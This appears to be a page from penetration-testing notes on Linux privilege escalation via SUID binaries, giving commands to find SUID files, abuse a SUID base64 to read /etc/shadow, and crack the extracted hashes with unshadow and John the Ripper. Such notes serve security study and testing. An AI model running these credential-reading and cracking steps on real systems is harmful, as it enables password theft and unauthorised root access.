SUID

General method to find files with SUID bit

$ find / -perm -u=s -type f 2>/dev/null

If there's a particular binary found that has the SUID bit set, refer to https://gtfobins.github.io/ to potentially find an exploit.

Example

Suppose the binary /usr/bin/base64 is found to contain the SUID bit. This can be exploited to view the contents of the /etc/shadowfile.

$ base64 /etc/shadow | base64 -d > shadow.txt
$ cat /etc/passwd > passwd.txt

The unshadow command can be used on the shadow.txt and passwd.txt files to create a file that is crack-able by John the ripper.

$ unshadow passwd.txt shadow.txt > password.txt
$ john --wordlist=[wordlist] password.txt
...

Subsequently, the password for a user with more privileges than the current one may be cracked. This will allow us to access that account to further escalate our privileges. For example, the cracked user may have SUID bits set, or sudo privileges for certain binaries that may contain exploits to access the root shell.

PreviousSudo NextCapabilities

Last updated 7 days ago